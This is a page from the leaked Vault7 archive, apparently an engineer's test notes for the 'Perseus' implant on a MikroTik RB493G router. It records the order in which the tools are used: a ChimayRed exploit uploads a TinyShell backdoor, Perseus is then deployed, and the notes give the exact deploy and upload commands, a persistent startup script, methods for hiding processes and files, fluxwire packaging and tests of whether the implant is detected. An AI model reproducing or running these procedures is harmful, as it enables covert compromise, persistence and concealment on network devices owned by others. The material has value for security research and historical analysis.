Vault7: CIA Hacking Tools Revealed

Navigation: » Latest version
Owner: User #14587667
Perseus 1.1.0b1 Mikrotik RB493G - Test Notes
Perseus 1.1.0 Beta 1
MikroTik RB493G
General Info
WAN (from TR-Core)
TR-CoreSwx: Perseus:
TR-Core Switch Route: -> (This gives the Perseus LANLocal Area Network 30 host IPs)
LAN Hosts: Perseus Test1 -1.1.0b1 - UbuntuDesktop 14.10 x64 Windows 7 VM
Cisco 2960:
- Changed RB493G ether1 IP to
- Changed RB493G ether2 IP to
- Default IP:
- Figure out how to run ChimayRed and TinyShell (TshPatcher).
- Unable to connect RB493G to Console server. Checked MT website and confirmed settings, but no luck.
- Downloaded and upgraded MT f/w to v6.27
- Move Windows VMVirtual Machine to VLAN-602 (Perseus Internal).
- Use Winbox to upload new f/w. Copy "routeros-mipsbe-6.27.npk" using the Files List window.
- Select System -> Reboot. Once rebooted, the new version number (6.27) will be seen in the Winbox Title.
Setup TR-Core route to
ip route name Perseus-MT_RB493G
- Add default route ( via for MT (IP -> Routes):
- Setup ACLAccess Control List (on TR-Core) to restrict VLANVirtual Local Area Network access (see Access List Configuration section below for settings).
- Configure NATNetwork Address Translation on RS493G using the following rule (IP -> Firewall -> NATNetwork Address Translation):
Delete 'Serial0' port under System -> Console.- Setup NTPNetwork Time Protocol client (System -> SNTP Client):
- Apply ACLs to VLAN601 (Perseus WANWide Area Network)
- Worked with Bingham to throw ChimayRed and TinyShell on MT RB-493G.
- Here is the order exploits/tools are used operationally:
- Package TinyShell with port, key, architecture, and shell (optional)
- Use ChimayRed to upload exploit (TinyShell) to MT. Requires access to port 8291 and 80.
- Connect to TinyShell. You are now in an encrypted session between ICON and the MT.
- Upload BusyBox and/or Perseus.
- For more specific details refer to the step-by-step guide Chimay Red, TinyShell, and BusyBox Quick Start Guide .
ID | Status | Task |
3 | complete | User #14587667 Need to get BusyBox binary from Bingham (Make sure I can log into OSN first). |
4 | complete | User #14587667 Use ChimayRed to upload BusyBox on MT. Use COGComputer Operations Group version of BB. |
5 | complete | User #14587667 Review ICON script/notes to flush out instructions above |
- Reset MT and exploited again using ChimayRed and TinyShell.
- Copied BusyBox binary from OSN to Devlan. Confirmed with Bingham that this is the current version that COG/NOD is using (mips-be version)
- Uploaded BusyBox (COGComputer Operations Group version) to MT using TinyShell.
ID | Status | Task |
6 | incomplete |
User #14587667 Finding: I had a TS connection opened and it was sitting idle for a while (maybe about 45 min). When I came back to remote shell, it was hung. Ctrl-C, Ctrl-Z, did not work. Nothing appears when I type.![]() |
7 | complete |
User #14587667 Bug??: After running ./start, I touched a file named /flash/boot/hi.txt and it was not hidden. After re-deploying P it was hidden![]() ![]() |
13 | incomplete | User #14587667 Caution: Do not make removal trigger a read-only partition. If so, how do you trigger removal? |
14 | incomplete |
User #14587667 Bug??: Did timestamp of /flash/boot change when Perseus installed? ![]() ![]() |
15 | complete |
User #14587667 ![]() ![]() |
- Talked with User #73708 on the phone. Secure delete is kicking and deleting the files Perseus should be hiding. User #73708 needs to research this some more and will get back in touch with me tomorrow.
- User #73709 requested configuration and log files of the Perseus installation and execution. 2015-04-16_063833-Perseus-Install_Log.log
- User #73708 and User #73709 came over to DD2 and User #73708 worked with me to troubleshoot the MT. It turns out that the kernel had been deleted by secure delete. User #73708 and User #73709 took the MT back with them to TP to perform further analysis.
- Re-configured MT with WAN, LAN, NATNetwork Address Translation settings. Device had been bricked and was reset by TP.
ID | Status | Task |
21 | incomplete |
User #14587667 Is this a CR bug?? If so, does it need to be reported? Error when throwing CR ![]() ![]() |
22 | complete |
User #14587667 Shouldn't this be hidden. ![]() ![]() Resolution: I spoke with User #73708 and Perseus hides the absolute path. In this case /tmp is a symlink to /rw/tmp and /rw/tmp is a symlink to /flash/rw/tmp. So /tmp is a symlink to /flash/rw/tmp. The full path needed to hide /tmp/tshd-mipsbe is actually /flash/rw/tmp/tsh-mipsbe. |
- Spoke with User #73708 to troubleshoot why /tmp/tshd-mipsbe is not hidden when running "ps ax" (Notes under 4/27/2015).
- Refer to "2015-04-28_110134-Perseus-ICON_window1 TS process not hidden w new command" for logs.
ID | Status | Task |
26 | complete |
User #14587667 Determine how to make TS startup after reboot. User #73708 suggested placing a startup script in /flash/etc/rc.d/run.d/S99tsh which will launch TS. Also need to upload TS to /flash/boot/hidden (/tmp is not persistent). |
- Created startup script to make tsh persistent (/flash/etc/rc.d/run.d/S99tsh).
- Although tsh is not hidden when run from /tmp/tshd-mipsbe, it is hidden when it is run from /flash/boot/hidden/tshd-mipsbe (after reboot).
- Current parameters used to generate perseus:
python -f /flash/boot/hidden -f /flash/etc/rc.d/run.d/S99mcc -f /flash/etc/rc.d/run.d/S99tsh -d /flash/boot/hidden -p /flash/rw/tmp/tshd-mipsbe -S /flash/boot/hidden/start -s 1 -m /flash/boot/hidden/mcc.ko -r /flash/boot/hidden/dont_panic deploy
ID | Status | Task |
27 | complete | User #14587667 When a process is started and then the originating binary is deleted (the process is still running), Perseus does not hide it. ![]() ![]() |
- Put together step by step instructions for TP to replicate bug PS-1.
ID | Status | Task |
28 | complete | User #14587667 Check these counters when using Perseus to see if it affects the counters ![]() |
ID | Status | Task |
29 | incomplete | Tsh traffic does show up in Torch when executing commands from ICON ![]() |
- Installed Cacti server (
- Racked Cisco 2960 to extend MT network. Added subnet
- Added VLANs 605, 606, 607 so hosts can be added to Cisco 2960/MT LAN2 for testing.
- Configured RB493G to send syslog and SNMPSimple Network Management Protocol to Cacti server.
- Fixed Cacti rsyslog config (/etc/rsyslog.conf) and added instructions to Linux confluence page.
Setup port-forward from WANWide Area Network IP to Cacti server.
Create trunk between RB493G and Cisco 2960 and connect two host VMs
- MT Settings: (switchports)
(ip address)
Cisco Settings:
- MT Settings: (switchports)
- Configured Cisco 2960
- NTP client (ntp server
- Default gateway (int vlan 10; ip default-gateway
- Setup syslog (service timestamps log datetime localtime; logging; logging trap informational)
- Configure flux
- flx-packer -s linux:mipsbe:mikrotik:6.x -o mt-fw_node -k aaaabbbbccccdddd --link "ip4= tcp=443 watchdog=0:0" -m 1250
- User #73710 confirmed with CANDILIS that fluxwire 3.3 was successfully run on a MikroTik running ROS 6.27. He did not confirm it was BE or LE.
- I am having trouble running fluxwire 3.3 on the RB493G running ROS 6.27. I was able to successfully create an Ubuntu flux node (using the same commands with the only difference being the target architecture).
- I was unable to run fluxwire when perseus was installed. The process never appeared in the process list. I tried running it from both hidden and non-hidden directories. As soon as I removed perseus, fluxwire ran just fine.
- This was not a Perseus bug. See notes from 5/19 for solution.
- The fluxwire node will not start if you try to run it from outside the directory it resides in. In other word, you must first cd to the binary's directory.
ID | Status | Task |
31 | incomplete | Ask User #73708 why they recommend /flash/boot. Is it because secure-delete is quicker? |
- Configured console server for RB493G and RB450G (Rack 6).
- Username: admin
- Password: <none>
- Setup P2P link between RB493G and RB450G.
On 493G: ip address add address= netmask= interface=ether4 comment=To_RB450G_ether4
On 450G: ip address add address= netmask= interface=ether4 comment=To_RB493G_ether4
Setup RIP routing between RB493G and RB450G
On 493G:
/routing rip interface add interface=ether4 comment="RIP to RB450"/routing rip interface add interface=ether6- /routing rip set redistribute-connected=yes
/routing rip network add network=
On 450G:
/routing rip interface add interface=ether4 comment="RIP to RB493"- /routing rip set redistribute-connected=yes
- /routing rip network add network=
Verify routes: /routing rip route print
- Perseus only deletes files/directories that are specified to be hidden.
- If secure delete is not used, but mcc is revereted manually (using /tmp/busybox rmmod mcc) ...
- To hide an executable, the absolute path to the binary must be specified using the -p option. The MT uses many symlinks (ie. /tmp is a symlink for /flash/rw/tmp), so be sure to determine the absolute path. You can use the "readlink -f <path>" command to show the absolute path.
- If ts is running from a hidden directory and perseus is removed (by touching trigger file), then the tshd process is no longer hidden and appears in the process list. So if tsh was run from /flash/boot/hidden/tshd-mipsbe the directory /flash/boot/hidden is deleted, but /flash/boot/hidden/tshd-mipsbe shows up in the process list (ps ax).
Install Perseus
ID | Status | Task |
20 | incomplete | User #14587667 Update these steps. for current instructions, refer to \\\share\Testing\Perseus 1.1.0b1\2015-04-15 Perseus Commands.txt |
- Copy to ICON VM.
- Build the installation package
$ python -f /flash/boot -f /tmp/busybox2 -d /flash/boot -d /flash/data -S /flash/boot/start -s 1 -m /flash/boot/mcc.ko -r /tmp/dont_panic deploy - Create /tmp/hidden directory on MT.
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 12345 MyPassphrase
# mkdir /tmp/hidden
# exit - Upload Perseus to MT. The prerequisites for this include CR, TS, and BB (optional).
From ICON, execute the commands:
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 12345 MyPassphrase put ~/Desktop/deploy_perseus_1.1.0.0b1_routeros6_mips/mcc.ko /flash/boot
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 12345 MyPassphrase put ~/Desktop/deploy_perseus_1.1.0.0b1_routeros6_mips/S99mcc /flash/boot
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 12345 MyPassphrase put ~/Desktop/deploy_perseus_1.1.0.0b1_routeros6_mips/start /flash/boot - Make "start" executable
# chmod +x /tmp/perseus/start - Start Perseus implant
# /flash/boot/start
Useful MT commands:
Command | Description |
/ip route print | Print list of IP addresses configured for router |
/system console print | Display list of console ports |
/port print | Check if application is using port |
/port print detail | Display port settings (baud, data rate, etc) |
/system serial-terminal serial0 | Connect to serial port |
Access List Configuration
Create ACL
ip access-list ext Perseus-WAN
permit ip host host
deny ip any any log
show access-list
Apply ACLAccess Control List to VLAN
int vlan 601
ip access-group Perseus-WAN in
show access-list Perseus-WAN
Add statement to ACLAccess Control List and resequence
ip access-list ext Perseus-WAN
15 permit ip host host
ip access-list resequence Perseus-WAN 10 10
Show Access List hits
show log | inc list Perseus-WAN
Areas to test
ID | Status | Task |
8 | incomplete | |
def parse_args(self, args):
# XXX TODO Bounds checks
# XXX Add checking for os version file, mcc, hide_files
ID | Status | Task |
9 | incomplete | Network latency |
Decreate network latency <40%
ID | Status | Task |
10 | incomplete | File remnants after Perseus removal |
11 | complete | Running processes ("ps ax") |
12 | incomplete | bouncing VMVirtual Machine / restarting networking service |
17 | incomplete | change MTU |
18 | incomplete | change latency |
30 | incomplete | Use MT Torch tool while implanting and see if anything is detected. |
19 | complete | Check available disk space (does it change after implanted?) |